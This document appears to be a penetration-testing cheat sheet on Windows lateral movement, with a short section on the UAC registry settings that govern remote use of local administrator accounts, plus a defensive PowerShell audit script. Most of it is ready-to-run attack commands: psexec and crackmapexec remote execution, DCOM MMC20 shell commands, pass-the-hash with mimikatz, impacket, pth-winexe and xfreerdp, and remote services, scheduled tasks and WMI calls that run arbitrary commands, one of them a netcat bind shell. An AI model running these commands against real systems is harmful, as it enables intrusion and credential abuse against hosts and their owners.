Lateral movements

Theory

It is not possible to use a local administrator account for lateral movement (UAC remote restrictions filter the token) if all of the following hold:

  • EnableLUA = 1

  • LocalAccountTokenFilterPolicy = 0

  • FilterAdministratorToken = 1

If FilterAdministratorToken = 0 and the other two values are as above, only the built-in RID 500 Administrator account can be used for lateral movement.

In all other cases any local administrator account can be used for lateral movement.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken
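The three registry values above decide whether local administrator accounts are usable over the network. The following audit script is an added example (not from the original page): it reads the values on the host it runs on, applies the defaults Windows uses when a value is absent, and reports the decision from the Theory section, so you can check which hosts in your estate still expose local admin accounts to network logon.

```powershell
# Added example: audit UAC remote-restriction settings on the local host.
# Run from an elevated PowerShell session. Assumed defaults when a value is missing:
# EnableLUA = 1, LocalAccountTokenFilterPolicy = 0, FilterAdministratorToken = 0
$key   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$props = Get-ItemProperty -Path $key

function Get-ValueOrDefault($obj, [string]$name, [int]$default) {
    # A missing value reads as $null; fall back to the assumed Windows default.
    if ($null -ne $obj.$name) { [int]$obj.$name } else { $default }
}

$enableLua   = Get-ValueOrDefault $props 'EnableLUA' 1
$tokenFilter = Get-ValueOrDefault $props 'LocalAccountTokenFilterPolicy' 0
$filterAdmin = Get-ValueOrDefault $props 'FilterAdministratorToken' 0

# Decision table from the Theory section above.
if ($enableLua -eq 1 -and $tokenFilter -eq 0 -and $filterAdmin -eq 1) {
    $verdict = 'No local administrator account usable for remote lateral movement'
} elseif ($enableLua -eq 1 -and $tokenFilter -eq 0) {
    $verdict = 'Only the built-in RID 500 Administrator account is usable remotely'
} else {
    $verdict = 'Any local administrator account is usable remotely (weak)'
}

# Enabled local accounts that would benefit from the weak setting.
$localAdmins = Get-LocalGroupMember -Group 'Administrators' |
    Where-Object { $_.PrincipalSource -eq 'Local' } |
    ForEach-Object { $_.Name }

[pscustomobject]@{
    ComputerName                  = $env:COMPUTERNAME
    EnableLUA                     = $enableLua
    LocalAccountTokenFilterPolicy = $tokenFilter
    FilterAdministratorToken      = $filterAdmin
    LocalAdminAccounts            = ($localAdmins -join ', ')
    Verdict                       = $verdict
}
```

The RID 500 account itself is the one to disable or rename where the second verdict applies; the third verdict is the setting to correct (remove LocalAccountTokenFilterPolicy or set it back to 0).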

Authenticated RCE

SMB

.\psexec64.exe \\<ip> -u .\<administrator> -p <password> [-c <malware.exe>] -s -accepteula
crackmapexec <ip> -u <user> -p <password> -d <domain> -<x|X> <command>

WinRM

From Windows

winrs -r:http://<ip>/wsman "<cmd>"

From Kali

auxiliary/scanner/winrm/winrm_auth_methods
auxiliary/scanner/winrm/winrm_login
auxiliary/scanner/winrm/winrm_cmd
exploit/windows/winrm/winrm_script_exec

DCOM with MMC application through RPC

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

$COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION", "<ip>"))
$COM.Document.ActiveView.ExecuteShellCommand("<C:\Windows\System32\calc.exe>", $Null, $Null, "7")
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<ip>")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\<ip>\$
./dcomexec.py <domain>/<user>:<password>@<ip> <cmd>

Pass-The-Hash

If you only have the NT hash, pad the LM half with zeros:

00000000000000000000000000000000:8845f7eaee8fb117ad06bdd830b7586c

crackmapexec <ip> -u <user> -H "<nthash>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python wmiexec.py -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<nthash> /run:<cmd>
kiwi_cmd "\"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<nthash> /run:cmd.exe\""
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
use exploit/windows/smb/psexec
https://github.com/Kevin-Robertson/Invoke-TheHash

Remote invoke executable

From attacker machine

Via a service (sc)

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Create and start the service, dodging the 30-second dilemma: the command is not a real service binary, so the Service Control Manager reports a start failure after its 30-second timeout, but cmd.exe /k keeps the spawned command alive regardless

sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>

Via a scheduled task (schtasks / at)

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Verify that the Schedule service is running and start it if not

sc \\<targetip> query schedule
sc \\<targetip> start schedule

3. Check the current local time on the target machine

net time \\<targetip>

4. Schedule the job

schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>
at \\<targetip> <HH:MM> <A/P> <command>

5. Verify the job status

schtasks /query /s <targetip>
at \\<targetip>

Via WMI

wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>

From compromised machine

\\<share>\<exe>

Target another machine using the credentials of the compromised host (Meterpreter script)

run schtasksabuse -c "<command1>(,command2)" -t <targetip>